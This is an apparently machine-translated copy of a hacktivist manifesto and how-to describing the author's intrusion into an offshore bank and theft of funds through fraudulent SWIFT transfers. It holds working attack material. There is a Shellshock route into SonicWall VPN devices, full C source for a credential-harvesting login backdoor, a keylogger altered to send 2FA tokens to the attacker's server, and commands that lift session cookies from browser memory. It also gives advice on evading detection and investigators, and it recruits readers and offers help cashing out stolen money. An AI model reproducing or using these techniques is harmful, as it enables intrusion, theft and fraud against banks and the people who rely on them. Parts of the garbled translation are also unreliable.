_ _ _ ____ _ _
| | | | __ _ ___ | | __ | __) __ _ ___ | | _ | |
| | _ | | / _` | / __ | | / / | _ \ / _` | / __ | | / / |
| _ | (_ | | (__ | <| | _) | (_ | | (__ | <| _ |
| _ | | _ | \ __, _ | \ ___ | _ | \ _ \ | ____ / \ __, _ | \ ___ | _ | \ _ (_)
A DIY guide to robbing banks
^ __ ^
(oo) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
''
By Subcommittee Marcos
I am a wild child
Innocent, free, wild
I have all ages
My grandparents live in me
I am brother of the clouds
And I only know how to share
I know that everything belongs to everyone
that everything is alive in me
My heart is a star
I am a son of the earth
I travel aboard my spirit
Road to eternity
This is my simple word that seeks to touch the hearts of simple and
humble, but also dignified and rebellious. This is my simple word for counting
of my hacks, and to invite other people to hack with joyful
rebellion.
I hacked into a bank. I did it to give a cash boost, but this time since
down and the simple and humble people who resist and rebel against the
injustices around the world. In other words: I robbed a bank and gave the
money. But it wasn't me alone who did it. The free software movement, the
offensive powershell community, the metasploit project and the hacker community
in general they are the ones that made this hack possible. The exploit.in community
made it possible to turn intrusion into a bank's computers into cash
and bitcoin. The Tor, Qubes and Whonix projects, together with the cryptographers and
activists who defend privacy and anonymity, they are my nahuals, it is
say, my protectors [1]. They accompany me every night and make it possible for me to continue in
Liberty.
I didn't do anything complicated. I only saw the injustice in this world, I felt love
for all beings, and I expressed that love in the best way I could, through the
tools I know how to use. I am not moved by hatred of banks, nor of the rich, but
a love for life, and the desire for a world where everyone can realize their
potential and living a full life. I would like to explain a little how I see the world,
so that you can get an idea of how it is that I came to feel and act that way.
And I also hope that this guide is a recipe that you can follow, combining the
same ingredients to bake the same cake. Who knows, there you are
such powerful tools end up serving you also to express the
love they feel.
We are all wild children
innocent, free, wild
We are all brothers of the trees
children of the earth
We just have to put it in our hearts
a lit star
(song by Alberto Kuselman and ChamalГє)
The police are going to invest a shitload of resources in investigating me. They believe that the
system works, or at least it will work once they catch all the
"bad guys". I am nothing more than the product of a system that does not work.
As long as injustice, exploitation, alienation, violence and
ecological destruction, many more will come like me: an endless series of
people who will reject as illegitimate the bad system responsible for this
suffering. That shoddy system is not going to be fixed by arresting me. I am
just one of the millions of seeds Tupac planted 238 years ago in La
Peace [2], and I hope that my actions and writings will water the seed of rebellion
in their hearts.
[1] https://es.wikipedia.org/wiki/Cadejo#Origen_y_significado_del_mito
[2] it was before being assassinated by the Spanish, just a day like yesterday, that
He said that about "they will only kill me, but tomorrow I will return and I will be millions".
____________________________________________
<We covered our faces to be seen>
--------------------------------------------
\
\ ^ __ ^
(oo) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
''
To make ourselves listen, hackers sometimes have to cover our faces, because
We are not interested in them seeing our face but understanding our word. The
mask can be from Guy Fawkes, Salvador DalГ, Fsociety, or in some case
the puppet of a crested toad. By affinity, this time I went to unearth
a deceased to lend me his ski mask. I think then that I should clarify that
Sup Marcos is innocent of everything that is told here because, in addition to being
dead, I did not consult him. I hope his ghost, if he finds out from some hammock
Chiapas, know how to find goodness to, as they say there, "dismiss this
deep fake "with the same gesture with which an inopportune insect walks away - good
it could be a beetle.
Even so with the ski mask and the name change, many of those who support my
actions may be going to pay too much attention to me. With your own
autonomy shattered by a lifetime of domination, they will be looking for a
leader to follow, or a heroine to save them. But behind the ski mask only
I am a girl. We are all wild children. We only have to place a star
em chamas em nossos corações.
- [1 - Why expropriate] ---------------------------------------- -------------
Capitalism is a system in which a minority has come to appropriate
a vast majority of the world's resources through war, theft and
operation. By taking the commons [1] from us, they forced those below to
be under the control of that minority that owns everything. It is a system
fundamentally incompatible with freedom, equality, democracy and the
Suma Qamaà ± a (Good Living). It may sound ridiculous for those of us who have grown up in a
propaganda machinery that taught us that capitalism is freedom, but in
True, what I say is not a new or controversial idea [2]. The founders
the United States of America knew they had to choose between creating a
capitalist society, or a free and democratic one. Madison recognized that "the
man who possesses wealth, he who lies on his sofa or rolls in his carriage,
cannot judge the wishes or feelings of the day laborer. "But to protect himself
Faced with the "spirit of equalization" of the landless laborers, it seemed to him
that only the landowners should vote, and that the government had to
serve to "protect the affluent minority from the great majority." John
Jay got more to the point and said, "Those who own the country should
rule it. "
____________________________________________________
/ There is no such thing as green capitalism. \
| Let's make capitalism history before we |
\ become history. /
-------------------------------------------------- -
\ / \ ___ / \
\ // \ / \ / \\
((OO))
\\ / \ //
\ / | | \ /
| | | | Evgeny, the great ignored elephant, does not understand why everyone
| | | | They pretend not to see you on the climate change panels, like this
| or | that here I give you a chance to say your lines.
| | | |
| m | | m |
In the same way that bell hooks [3] argues that the rejection of culture
Patriarchal domination is an act in defense of the male's own interest (already
that emotionally mutilates them and prevents them from feeling love and connection in a way
full), I believe that the culture of domination of capitalism has an effect
similar about the rich, and that they could have fuller and more satisfying lives
if they rejected the class system they think they benefit from. For many,
class privilege equates to a childhood of emotional neglect, followed
From a life of superficial social interactions and mindless work. Can
that deep down they know that they can only genuinely connect with people
when they work with them as their equals, and not when they put them at their service.
They may know that sharing their material wealth is the best thing they can do.
with her. You may also know that significant experiences,
Connections and relationships that count are not those that come from
mercantile interactions, but precisely to reject the logic of the market
and give without expecting anything in return. Maybe they know that all they need to
escaping your prison and truly living is letting go, giving up control, and
take a leap of faith. But most of them lack courage.
Then it would be naive of us to direct our efforts to try to
produce some kind of spiritual awakening in the rich [4]. As Assata says
Shakur: "No one in the world, no one in history, has ever achieved their
freedom by appealing to the moral sense of their oppressors. "In reality, when the
wealthy people distribute their money, almost always in a way that reinforces the
system that to begin with allowed them to amass their enormous and illegitimate wealth
[5]. And the change is unlikely to come through a political process;
as Lucy Parsons says: "Let us never be fooled that the rich
let them vote to take away their wealth. "Colin Jenkins justifies the
expropriation with these words [6]:
Make no mistake, expropriation is not theft. It is not the confiscation of
money earned "with the sweat of the brow." It is not property theft
private. It is, rather, the reclamation of huge amounts of land and
wealth that has been forged with stolen natural resources, slavery
human, forced labor force amassed in hundreds of years by one
small minority. This wealth ... is illegitimate, both morally and
as to the exploitation mechanisms that have been used to create it.
For Colin, the first step is that "we have to free ourselves from our bondage
mental (believing that wealth and private property have been earned by
those who monopolize them; and that, therefore, should be something to respect,
revere, and even something to chase), open our minds, study and
learn from history, and recognize this illegitimacy together. "
some books that have helped me with this [7] [8] [9] [10] [11].
According to Barack Obama, economic inequality is "the defining challenge for our
time. "Computer hacking is a powerful tool to combat
economic inequality. Former NSA Director Keith Alexander agrees
and says that hacking is responsible for "the largest transfer of wealth from the
story".
_________________________
/ The story is ours \
\ and hackers do it! /
-------------------------
\
\ ^ __ ^
(oo) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
''
Beyond present, now and always!
[1] https://sursiendo.com/docs/Pensar_desde_los_comunes_web.pdf
[2] https://chomsky.info/commongood02/
[3] The Will to Change: Men, Masculinity, and Love
[4] his own religion is already very clear about it:
https://dailyverses.net/es/materialismo
[5] https://elpulso.hn/la-filantropia-en-los-tiempos-del-capitalismo/
[6] http://www.hamptoninstitution.org/expropriation-or-bust.html
[7] Manifesto for a Democratic Civilization. Volume 1, Civilization: The Age
of the Masked Gods and the Covered Kings
[8] Caliben and the Witch
[9] In Debt: An Alternative History of the Economy
[10] The other history of the United States
[11] The open veins of Latin America
_________________________________
<Our weapon is our keyboard>
---------------------------------
\
\ ^ __ ^
(oo) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
'' ^^ ^^
- [2 - Introduction] ------------------------------------------- ---------------
This guide explains how I hacked the Cayman Bank and Trust Company
(Isle of Man). Why am I posting this, almost four years later?
1) To show what is possible
Hackers working for social change have limited themselves to developing
security and privacy tools, DDoS, perform defacements and leaks.
Wherever you go there are radical projects for a complete social change
precarious state, and there would be a lot they could do with a little money
expropriated. At least for the working class, bank robbery is something
socially accepted, and those who do are seen as heroes of the people. On
the digital age, robbing a bank is a non-violent act, less risky, and the
reward is greater than ever. So why are only hackers from
black hat that they do for their personal benefit, and never
hacktivists to fund radical projects? Maybe they don't think they are
able to do it. Big bank hacks are on the news every
as well as the hack of the Bangladesh Bank [1], which was attributed to Korea
Norte, or the hacks to banks attributed to the Carbanak group [2], which they describe
as a very large and well organized group of Russian hackers, with different
members who would be specialized in different tasks. And, well, it is not so
complicated.
It is because of our collective belief that the financial system is unquestionable
that we exercise control over ourselves, and maintain the class system
without those above having to do anything [3]. To be able to see how vulnerable and
fragile is actually the financial system helps us break that hallucination
collective. That is why banks have a strong incentive not to report
hacks, and to exaggerate how sophisticated the attackers are. None of the
Financial hacks that I did, or have known about, have never been reported.
This is going to be the first, and not because the bank wanted to, but because I
I decided to publish it.
As you are about to learn in this homemade guide, hack a bank and
transferring the money through the SWIFT network does not require the support of any
government, or a large and specialized group. It's totally possible
being a mere hobbyist and heap hacker, with only tools
audiences and basic knowledge of how to write a script.
[1] https://elpais.com/economia/2016/03/17/actualidad/1458200294_374693.html
[2] https://securelist.lat/el-gran-robo-de-banco-el-apt-carbanak/67508/
[3] https://es.wikipedia.org/wiki/Hegemonía_cultural
2) Help withdraw cash
Many of those who read this already have, or with a little study they will be
able to acquire, the skills necessary to carry out a hack
like this. However, many will find that they lack the
criminal connections needed to get the handles out in good condition. In Myself
In any case, this was the first bank to hack, and at that time it only had a few
few and mediocre accounts prepared to be able to withdraw the cash (known
as bank drops), so it was only a few hundred thousand that
I was able to withdraw in total, when the normal thing is to withdraw millions. Now, instead, yes
that I have the knowledge and connections to get more serious cash, from
So if they find themselves hacking into a bank but need help converting
that in real money, and they want to use that wool to finance projects
radical social, contact me.
3) Collaborate
It is possible to hack banks like a solo hobbyist, but the
The bottom line is that, in general, it is not as easy as I paint it here. I was lucky with
this bank for several reasons:
1) It was a small bank, so it took me much less time to get to
understand how everything worked.
2) They had no procedure to check the swift messages sent.
Many banks have one, and you need to write code to hide your
transfers from your monitoring system.
3) They only used password authentication to access the application with the
that were connected to the SWIFT network. Most banks now use RSA
SecurID, or some form of 2FA. You can skip this by typing code to
receive an alert when your token enters, so you can use it before
expires. It is simpler than it seems: I have used Get-Keystrokes [1],
modifying it so that instead of storing the keys pressed, a
GET request to my server every time it is detected that they have entered a
Username. This request adds the username to the url and,
as they type the token, several GETs are made with the token digits
concatenated to the url. On my side I leave this running in the meantime:
ssh me @ my_secret_server 'tail -f / var / log / apache2 / access_log'
| while read i; do echo $ i; aplay alarm.wav &> / dev / null; done
If it is a web application, you can skip the 2FA by stealing the cookie
after they have authenticated. I'm not an APT with a team of coders
that they can make me custom tools. I am a simple person who lives
from what terminal [2] gives you, so what I use is:
procdump64 / accepteula -r -ma PID_del_browser
strings64 / accepteula * .dmp | findstr PHPSESSID 2> nul
or by passing it through findstr rather than strings, which makes it much more
fast:
findstr PHPSESSID * .dmp> tmp
strings64 / accepteula tmp | findstr PHPSESSID 2> nul
Another way to skip it is by accessing your session with a hidden VNC (hvnc)
after they have authenticated, or with a little creativity too
you could focus on another part of your process instead of sending messages
SWIFT directly.
I think if he collaborated with other experienced bank hackers we could
make us hundreds of banks like Carnabak, instead of making one of so many
in as much on my own. So if you have experience with similar hacks and
you want to collaborate, contact me. You will find my email and my PGP key at the end of
the previous guide [3].
[1] https://github.com/PowerShellMafia/PowerSploit/blob/master/
Exfiltration / Get-Keystrokes.ps1
[2] https://lolbas-project.github.io/
[3] https://www.exploit-db.com/papers/41914
________________________________________
/ If robbing a bank changed things, \
\ would make it illegal /
----------------------------------------
\
\ ^ __ ^
(oo) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
''
- [3 - Be careful out there] ---------------------------------------- ------
It is important to take some simple precautions. I will refer to this
same section of my last guide [1], since apparently it works just fine
[two]. All I have to add is that, in Trump's words, "Unless
catch hackers red-handed, it's rete-hard to determine who is what
was performing the hack "so that the police are getting more and more
creative [3] [4] in her attempts to catch criminals in the act (when
your encrypted hard drives are unlocked). So it would be nice if by
For example, you carry a certain bluetooth device and configure your
computer to turn off when you move beyond a certain range, or
when an accelerometer detects movement, or something like that.
You may write long articles detailing your actions and your ideology not
be the safest thing in the world (Oops!), but at times I feel like I had to
do it.
If I did not believe in who listens to me
If I didn't believe in what hurts
If I didn't believe in what's left
If I did not believe in what he fights
What a thing ...
What would the mace be without quarry?
[1] https://www.exploit-db.com/papers/41914
[2] https://www.wifi-libre.com/topic-1268-italia-se-rinde-y-deja-de-buscar-a-
phineas-fisher.html
[3] https://www.wired.com/2015/05/silk-road-2/
[4] https://motherboard.vice.com/en_us/article/59wwxx/fbi-airs-alexandre-cazes-
alphabay-arrest-video
, - \ __
| f- "Y \ ____________________
\ () 7L / | Be gay! |
cgD | Do the crime! | __ _
| \ (---------------------. 'Y'>,
\ \ \ / _ _ \
\\\ \) (_) (_) (|}
\\\ {4A} /
\\\ \ uLuJJ / \ l
\\\ | 3 p) /
\\\ ___ __________ / nnm_n //
c7 ___-__, __-) \, __) (". \ _> - <_ / D
// V \ _ "-._.__ G G_c __.-__ <" / (\
<"-._> __-, G _.___) \ \ 7 \
("-.__. | \" <.__.- ") \ \
| "-.__" \ | "-.__.-". \ \ \
("-.__" ". \" -.__.- ". | \ _ \
\ "-.__" "|! |" -.__.- ".) \ \
"-.__" "\ _ |" -.__.- "./ \ l
".__" ""> G> -.__.- "> .--, _
"" G
Many blame queer people for the decline of this society;
we are proud of it
Some believe we want to burn to ashes
this civilization and its moral fabric;
They couldn't be more right
We are often described as depraved, decadent, and unruly
But oh! They haven't seen anything yet
theanarchistlibrary.org
- [4 - Get access] ------------------------------------------ ------------
In another place [1] I was telling them about the main ways to get
initial access to a company's network during a targeted attack. However,
This was not a targeted attack. I did not set out to hack a specific bank,
he wanted was to hack any bank, which ends up being a chore a lot
simpler. This type of nonspecific approach was popularized by Lulzsec and
Anonymous [2]. As part of [1], I prepared an exploit and some tools for
post-exploit for a popular VPN device. Then I started scanning the
whole internet with zmap [3] and zgrab to identify other devices
vulnerable. I had the scanner save the vulnerable IPs, along with the
"common name" and the "alt names" of the SSL certificate of the device, the names
Windows domain device, and reverse DNS lookup of IP. You
I did a grep to the result looking for the word "bank", and there was enough for
choose, but the truth is that the word "Cayman" attracted me, and that's how I came
to keep this one.
[1] https://www.exploit-db.com/papers/41914
[2] https://web.archive.org/web/20190329001614/http://infosuck.org/0x0098.png
[3] https://github.com/zmap/zmap
---- [4.1 - The Exploit] ---------------------------------------- ----------------
When I published my latest DIY guide [1] I did not reveal the details of the exploit of
sonicwall that he had used to hack Hacking Team as it was very useful for
other hacks, like this one, and I hadn't finished having fun with it yet.
Determined then to hack Hacking Team, I spent weeks engineering
reverse to his ssl-vpn model from sonicwall, and even managed to find
various memory corruption vulnerabilities more or less difficult to
explode, before I realized that the device was easily exploitable
with shellshock [2]. When shellshock came out, many sonicwall devices were
vulnerable, just with a request to cgi-bin / welcome, and a payload in the
user-agent. Dell released a security update and advisory for these
versions. The version used by Hacking Team and this bank had the version of
bash vulnerable, but cgi requests did not trigger the shellshock except for
requests to a shell script, and there was just one accessible:
cgi-bin / jarrewrite.sh. This seems to have escaped the Dell ones in their note,
since they never released a security update or an advisory for that
version of the sonicwall. And, kindly, Dell had done two2unix setuid root,
leaving a device easy to root.
In my last guide many read that I spent weeks researching a device
until they came up with an exploit, and they assumed that meant I was some guy
hacker elite. The reality, that is, the fact that it took me two weeks
realize it was trivially exploitable with shellshock, it's maybe less
flattering to me, but I think it's also more inspiring. Show that
You can really do this yourself. You don't need to be a genius, I
I certainly am not. Actually my work against Hacking Team started a
year before. When I discovered Hacking Team and Gamma Group in the
CitizenLab research [3] [4], I decided to explore a bit and see if I could
find something. I didn't get anywhere with Hacking Team, but I was lucky with
Gamma Group, and I was able to hack their customer support portal with sql injection
basic and file upload vulnerabilities [5] [6]. However, despite
that their support server gave me a pivot to the internal Gamma network
Group, I was unable to penetrate further into the company. from this one on
experience with the Gamma Group and other hacks, I realized that I was
really limited by my lack of knowledge about privilege escalation and
lateral movement in domains windows, active directory and windows in general.
So I studied and practiced (see section 11), until I felt like I was ready
to pay Hacking Team a visit again almost a year later. Practice
paid off, and this time I was able to make a full commitment of the
company [7]. Before I realized I could get in with shellshock, I was
willing to spend whole months happy in life studying development of
exploits and writing a trusted exploit for one of the vulnerabilities of
memory corruption that he had found. I only knew that Hacking Team
needed to be exposed, and that it would take as long as necessary and
he would learn what he had to learn to get it. To perform these
hacks don't need to be brilliant. You don't even need great knowledge
technician. You just need dedication, and believe in yourself.
[1] https://www.exploit-db.com/papers/41914
[2] https://es.wikipedia.org/wiki/Shellshock_(error_de_software)
[3] https://citizenlab.ca/tag/hacking-team/
[4] https://citizenlab.ca/tag/finfisher/
[5] https://theintercept.com/2014/08/07/leaked-files-german-spy-company-helped-
bahrain-track-arab-spring-protesters /
[6] https://www.exploit-db.com/papers/41913
[7] https://web.archive.org/web/20150706095436/https://twitter.com/hackingteam
---- [4.2 - The Backdoor] ---------------------------------------- ---------------
Part of the backdoor that I prepared for Hacking Team (see [1], section 6) was a
Simple wrapper on the login page to capture passwords:
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>
int main ()
{
char buf [2048];
int nread, pfile;
/ * pull the log if we send a special cookie * /
char * cookies = getenv ("HTTP_COOKIE");
if (cookies && strstr (cookies, "our private password")) {
write (1, "Content-type: text / plain \ n \ n", 26);
pfile = open ("/ tmp / .pfile", O_RDONLY);
while ((nread = read (pfile, buf, sizeof (buf)))> 0)
write (1, buf, nread);
exit (0);
}
/ * the principal stores the POST data and sends it to the child,
which is the real login program * /
int fd [2];
pipe (fd);
pfile = open ("/ tmp / .pfile", O_APPEND | O_CREAT | O_WRONLY, 0600);
if (fork ()) {
close (fd [0]);
while ((nread = read (0, buf, sizeof (buf)))> 0) {
write (fd [1], buf, nread);
write (pfile, buf, nread);
}
write (pfile, "\ n", 1);
close (fd [1]);
close (pfile);
wait (NULL);
} else {
close (fd [1]);
dup2 (fd [0], 0);
close (fd [0]);
execl ("/ usr / src / EasyAccess / www / cgi-bin / .userLogin",
"userLogin", NULL);
}
}
In the case of Hacking Team, they logged into the VPN with one-time passwords,
so the VPN gave me access only to the network, and from there I took
an extra effort to get domain admin on your network. In the other guide I wrote
on side passes and privilege escalation in windows domains [1]. In this
However, it was the same Windows domain passwords that were
used to authenticate against the VPN, so I was able to get a good deal of
user passwords, including domain admin passwords. Now I had total
access to your network, but usually this is the easy part. The hardest part
is to understand how they operate and how to get the pisto.
[1] https://www.exploit-db.com/papers/41914
---- [4.3 - Fun facts] ---------------------------------------- ------------
Following the investigation they did on the hack, I found it interesting
see that, around the same time that I did, the bank may have been
compromised by someone else through a targeted phishing email [1].
As the old saying goes, "give a person an exploit and they will have access for a
day, teach him to phishear and he'll have access all his life. "[2] The fact that
someone else, by chance and at the same time as me, put this bench
small target (they registered a domain similar to the real domain of the bank
to be able to send the phishing from there) suggests that bank hacks
they occur much more frequently than is known.
A fun suggestion so you can follow the investigations of your
hacking is having a backup access, one that you won't touch unless you
lose normal access. I have a simple script that expects commands a
once a day, or less, just to maintain long-term access in the case of
that block my regular access. Then I had a powershell empire [3]
calling home more often on a different IP, and used empire to
launch meterpreter [4] against a third IP, where it did most of the
my job. When PWC started investigating the hack, they found my use of
empire and meterpreter and cleaned those computers and blocked those IPs, but
They didn't detect my backup access. PWC had placed
network monitoring, to be able to analyze the traffic and see if there was still
infected computers, so I didn't want to connect to their network much. Only
I launched mimikatz once to get the new passwords, and from there
I was able to continue his investigations by reading his emails in the outlook web access.
[1] page 47, Project Pallid Nutmeg.pdf, in torrent
[2] [3] https://github.com/EmpireProject/Empire
[4] https://github.com/rapid7/metasploit-framework
- [5 - Understand Banking Operations] ------------------------------------
To understand how the bank operated, and how it could get money, I followed the
techniques that I summarized in [1], in section "13.3 - Internal Recognition".
I downloaded a list of all the filenames, grep it for
of words like "SWIFT" and "transfer", and downloaded and read all the
files with interesting names. I also looked for employee emails, but from
By far the most useful technique was to use keyloggers and screenshots to
observe how the bank employees worked. I didn't know it at the time, but
for this Windows brings a very good monitoring tool [2]. How I know
described in technique no. 5 of section 13.3 in [1], I made a screenshot of the
keys pressed across the domain (including window titles), I did a
grep looking for SWIFT, and found some employees opening 'SWIFT Access
Service Bureau - Logon '. For those employees, I ran meterpreter as in [3], and
I used the post / windows / gather / screen_spy module to take screenshots
every 5 seconds, to see how they worked. They were using an app
remote citrix from the company bottomline [4] to access the SWIFT network, where
Each SWIFT MT103 payment message had to go through three employees: one
to "create" the message, one to "verify" it, and another to "authorize" it. What
He already had all his credentials thanks to the keylogger, I was able to do with
ease the three steps myself. And from what I knew after seeing them
work, they weren't reviewing sent SWIFT messages, so you should have
enough time to get the money out of my bank drops before the bank
noticed and tried to reverse the transfers.
[1] https://www.exploit-db.com/papers/41914
[2] https://cyberarms.wordpress.com/2016/02/13/using-problem-steps-recorder-psr-
remotely-with-metasploit /
[3] https://www.trustedsec.com/blog/no_psexec_needed/
[4] https://www.bottomline.com/uk/products/bottomline-swift-access-services
_________________________________________
/ Who robs a thief, is one hundred years old \
\ of forgiveness. /
-----------------------------------------
\
\ ^ __ ^
(oo) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
''
- [6 - Send the money] ----------------------------------------- -------------
I didn't have much idea what I was doing, so I was finding out
by the way. Somehow, the first transfers I sent went
well. The next day, I screwed up by sending a transfer to Mexico that put
end to my fun. This bank sent your international transfers
through your correspondent account at Natwest. I had seen that the account
Correspondent for sterling (GBP) transfers was listed as
NWBKGB2LGPL, while for the others it was NWBKGB2LXXX. The transference
Mexican was in GBP, so I assumed I had to put NWBKGB2LGPL as
correspondent. If I had prepared it better I would have known that the LPG instead of
XXX stated that the payment would be sent through the Quick Payments Service of the
UK, rather than as an international transfer, which obviously
Well, it won't work when you're trying to send money to Mexico. So
the bank got an error message. The same day I also tried to send a
payment of ВЈ200k to UK using NWBKGB2LGPL, which was not made because 200k exceeded the
shipping limit using quick payments, and would have had to use NWBKGB2LXXX in
time. They also got an error message for this. They read the messages,
They investigated, and found the rest of my transfers.
- [7 - The button] ------------------------------------------ --------------------
From what I write, you will already have a complete notion of what my ideals are already
what things I give you my support. But I don't want to see anyone in legal trouble
for receiving expropriated funds, so not a word more about where
it was the wool. I know journalists are probably going to want to put some
number on how many dollars were distributed in this hack and other
similar, but I prefer not to encourage our perverse habit of measuring
shares just for their economic value. Any action is admirable if it is
It comes from love and not from the ego. Unfortunately the top, the rich and
powerful, public figures, businessmen, people in positions
"important", those that our society respects and values most, those have been
placed where they are based on acting more from the ego than from love. Is in
the simple, humble and "invisible" people whom we should already look at
who we should admire.
- [8 - Cryptocurrencies] ------------------------------------------- --------------
Redistribute expropriated money to Chilean projects seeking social change
positive it would be easier and safer if those projects accepted donations
anonymous via cryptocurrencies like monero, zcash, or at least bitcoin. It is understood
that many of those projects have an aversion to cryptocurrencies, since
they look more like some strange hypercapitalist dystopia than economics
social with which we dream. I share your skepticism, but I think they are
Useful for allowing anonymous donations and transactions by limiting the
government surveillance and control. Just like cash, the use of which many
countries are trying to limit for the same reason.
- [9 - Powershell] ------------------------------------------- -----------------
In this operation, as in [1], I made a lot of use of powershell. For
back then, powershell was super cool, you could do just about anything you
you would like, without antivirus detection and with very little forensic footprint. It happens
that with the introduction of the AMSI [2] the offensive powershell is retiring.
Today the offensive C # is what is on the rise, with tools such as
[3] [4] [5] [6]. AMSI is coming to .NET by 4.8, so to the tools in
C # will probably still have a couple of years left before they get out of date.
And then we will go back to using C or C ++, or maybe Delphi will get back to
fashion. Specific tools and techniques change every few years, but in
the bottom line is not so much what changes, today hacking in essence is still the
Same thing as it was in the 90s. Actually all powershell scripts
used in this guide and in the previous one [1] are still perfectly usable
today, after a little obfuscation of your own harvest.
[1] https://www.exploit-db.com/papers/41914
[2] https://medium.com/@byte_St0rm/
adventures-in-the-wonderful-world-of-amsi-25d235eb749c
[3] https://cobbr.io/SharpSploit.html
[4] https://github.com/tevora-threat/SharpView
[5] https://www.harmj0y.net/blog/redteaming/ghostpack/
[6] https://rastamouse.me/2019/08/covenant-donut-tikitorch/
___________________________
/ Fo Sostyn, Fo Ordaag \
\ Financial Sector Fuck Off /
---------------------------
\
\ ^ __ ^
(oo) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
''
- [10 - Torrent] ------------------------------------------- -------------------
Privacy for the weak, transparency for the powerful.
Offshore banking provides privacy from their own government to
executives, politicians and millionaires. Exposing them may sound
hypocritical of me, since I am generally in favor of privacy and
against government surveillance. But the law was already written by and
for the rich: protects your system of exploitation, with some limits (such as
taxes) so that society can function and the system does not collapse under the
weight of his own greed. So no, privacy is not the same for
powerful, when it allows them to evade the limits of a system per se
designed to give them privileges; and privacy for the weak, to whom
it protects from a system designed to exploit them.
Even journalists with the best of intentions find it impossible
study such a vast amount of material and know what will turn out
relevant to people in different parts of the world. When I filtered the
Hacking Team files, I gave The Intercept a copy of the emails
electronic one month in advance. They found a couple of the 0days that
Hacking Team was using, they previously reported them to MS and Adobe and published
a few stories once the leak went public. No point
compared to the enormous amount of articles and research that came after
full filtering to the public. Seeing it like this, and also considering the (not)
editorialized publication [1] of the Panama papers, I think that a
Public and complete filtration of this material is the right choice.
[1] https://www.craigmurray.org.uk/archives/2016/04/corporate-media-gatekeepers-
protect-western-1-from-panama-leak /
Psychologists found that those lower down in the hierarchies tend to
understand and empathize with those at the top, but that the opposite is less
common. This explains why, in this sexist world, many men joke about
his inability to understand women, as if it were a mystery
irresolvable. Explain why the rich, if they stop to think about whom
they live in poverty, they give advice and "solutions" so far removed from the
reality that makes you want to laugh. Explain why we revere executives
as brave who take risks. What are they risking beyond their
privilege? If all their ventures fail, they will have to live and work
like the rest of us. It also explains why there will be many who accuse
from irresponsible and dangerous to this leak without scratches. Feel the
"danger" on an offshore bank and its clients much more intensely than
what the misery of those dispossessed by this unjust system and
unequal. And the leakage of their finances, is it a danger to them, or
so just for his position at the top of a hierarchy that he shouldn't even
exist?
, ------------------------------------------------- -.
_, -._ | They vilify us, those infamous ones; when the only |
; ___: | difference is that they rob the poor |
, - '(..)' --.__ | protected by law, heaven knows, and we |
_; ||| \ | we plunder the rich under the sole protection of |
'._, -----' ''; = .____, "| our own courage. Do not prefer to be |
/// <or> | ## | | one of us, rather than begging before those |
(or \ `- '/ villains looking for work? |
/// \ >>>> _ \ <<<< // `--------------------------------- ------------------ '
--._ >>>>>>>> <<<<<<<< /
___ () >>> [||||] <<<<
`- '>>>>>>>> <<<<<<<
>>>>>>> <<<<<<
>>>>> <<<<<
>> ctr <<
Captain Bellamy
- [11 - Learn to hack] ----------------------------------------- -----------
You don't start out with hacking right. You start out hacking shit, thinking
which is good, and then little by little you get better. That's why I always say
that one of the most valuable virtues is persistence.
- Tips from Octavia Butler for the APT Applicant
The best way to learn how to hack is by hacking. Build a lab with
virtual machines and started testing things, taking a break to investigate
anything you don't understand. At the very least you will want a windows server
as a domain controller, another normal windows vm joined to the domain, and one
development machine with visual studio to compile and modify tools.
Try to make an office document with macros that launch meterpreter or another
RAT, and tried meterpreter, mimikatz, bloodhound, kerberoasting, smb relaying,
psexec and other side pass techniques [1]; as well as the other scripts,
tools and techniques mentioned in this guide and the previous one [2]. To the
at first you can disable windows defender, but then try everything
having it activated [3] [4] (but deactivating the automatic sending of samples).
Once you're comfortable with all of that, you're ready to hack 99% of the
companies. There are a couple of things that at some point will be very useful in your
learning, how to cope comfortably with bash and cmd.exe, a domain
basic powershell, python and javascript, have knowledge of kerberos [5] [6]
and active directory [7] [8] [9] [10], and fluent English. A good book
Introductory is The Hacker Playbook.
I also want to write a bit about things not to focus on if you don't
you want to entertain just because someone told you that you are not a hacker "of
true "if you don't know assembler. Obviously, learn whatever interests you,
but I write these lines thinking about those things in which you can
focus for practical results if hacking is what you are looking for
companies to filter and expropriate. A basic knowledge of safety in
web applications [11] is useful, but specializing more in web security is not
really the best use of your time, unless you want to do a career in
pentesting or hunting bounty for bugs. The CTFs, and most of the
resources that you will find when looking for information on hacking, focus
generally in skills like web security, reverse engineering, development
of exploits, etc. Things that make sense understanding them as a way of
prepare people for careers in industry, but not for our
objectives. Intelligence agencies can afford to have a team
dedicated to the most advanced in fuzzing, a team working on development of
exploits with a geey exclusively investigating the new techniques of
manipulation of the mound, etc. We have neither the time nor the
resources for that. The two most important skills for hacking by far
practical are phishing [12] and social engineering to gain access
initial, and then be able to scale and move through the windows domains.
[1] https://hausec.com/2019/08/12/offensive-lateral-movement/
[2] https://www.exploit-db.com/papers/41914
[3] https://blog.sevagas.com/IMG/pdf/BypassAVDynamics.pdf
[4] https://www.trustedsec.com/blog/
discovering-the-anti-virus-signature-and-bypassing-it /
[5] https://www.tarlogic.com/en/blog/how-kerberos-works/
[6] https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
[7] https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/
[8] https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/
[9] https://adsecurity.org/
[10] https://github.com/infosecn1nja/AD-Attack-Defense
[11] https://github.com/jhaddix/tbhm
[12] https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-
external-engagement-through-spear-phishing /
- [12 - Recommended Reading] ------------------------------------------ ------
__________________________________________
/ When the scientific level of a world \
| far exceeds their level of solidarity, |
\ that world destroys itself. /
------------------------------------------
\ _. --- ._. .
* \. ' '. *
* _.- ~ =========== ~ -._
. (___________________). *
. ' \ _______ /. '
. ' . '
'
- To me
Almost all hacking today is done by black hat hackers, for their
personal benefit; or by white hat hackers, for the benefit of the
shareholders (and in defense of the banks, companies and states that are
annihilating us and the planet we live on); and by military and
intelligence agencies, as part of their war and conflict agenda. Watching
that this our world is already at the limit, I have thought that, in addition to these
technical tips to learn to hack, should include some resources that
